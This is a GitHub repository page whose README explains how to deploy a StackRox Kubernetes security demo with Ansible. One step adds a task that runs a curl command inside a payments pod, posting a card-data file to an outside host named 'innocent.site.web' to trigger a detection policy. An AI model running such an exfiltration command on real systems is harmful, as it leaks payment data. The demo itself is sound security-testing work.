https://github.com/nmasse-itix/stackrox-demo
https://github.com/nmasse-itix/stackrox-demo
Last synced: 2 months ago
JSON representation
- Host: GitHub
- URL: https://github.com/nmasse-itix/stackrox-demo
- Owner: nmasse-itix
- Created: 2021-10-18T09:41:00.000Z (over 3 years ago)
- Default Branch: main
- Last Pushed: 2022-01-18T14:25:23.000Z (over 3 years ago)
- Last Synced: 2025-02-12T11:16:24.008Z (4 months ago)
- Language: Shell
- Size: 5.86 KB
- Stars: 0
- Watchers: 2
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# Stackrox Demo
## Deploy central
TODO
## Deploy demo
Create secrets.yaml and review it.
```sh
cp ansible/group_vars/all/secrets.yaml.sample ansible/group_vars/all/secrets.yaml
```
Install the pre-requisites.
```sh
ansible-galaxy collection install kubernetes.core
sudo dnf install python3-openshift
```
Patch the existing roles.
```sh
echo -n > ansible/roles/ocp4_workload_stackrox_demo_apps/tasks/pre_workload.yml
echo -n > ansible/roles/ocp4_workload_stackrox_demo_pipeline/tasks/pre_workload.yml
```
Edit `roles/ocp4_workload_stackrox_demo_apps/tasks/deploy_demos.yml` and modify accordingly.
```yaml
- name: k8s_exec violation
kubernetes.core.k8s_exec:
namespace: payments
pod: "{{ r_processor_pod.resources[0].metadata.name }}"
command: 'curl -X POST --data-binary @/var/lib/processor/card_data http://innocent.site.web'
ignore_errors: yes
```
Deploy the demo.
```sh
cd ansible
export K8S_AUTH_VERIFY_SSL=false
export K8S_AUTH_KUBECONFIG="$KUBECONFIG"
ansible-playbook install.yaml
```
## With a custom registry
```sh
./mirror.sh
oc apply -f icsp.yaml
podman login registry.itix.xyz
base64 -w0 ${XDG_RUNTIME_DIR}/containers/auth.json > /tmp/auth.b64
echo "ocp4_workload_stackrox_demo_apps_pull_secret: $(cat /tmp/auth.b64)" >> ansible/group_vars/all/secrets.yaml
```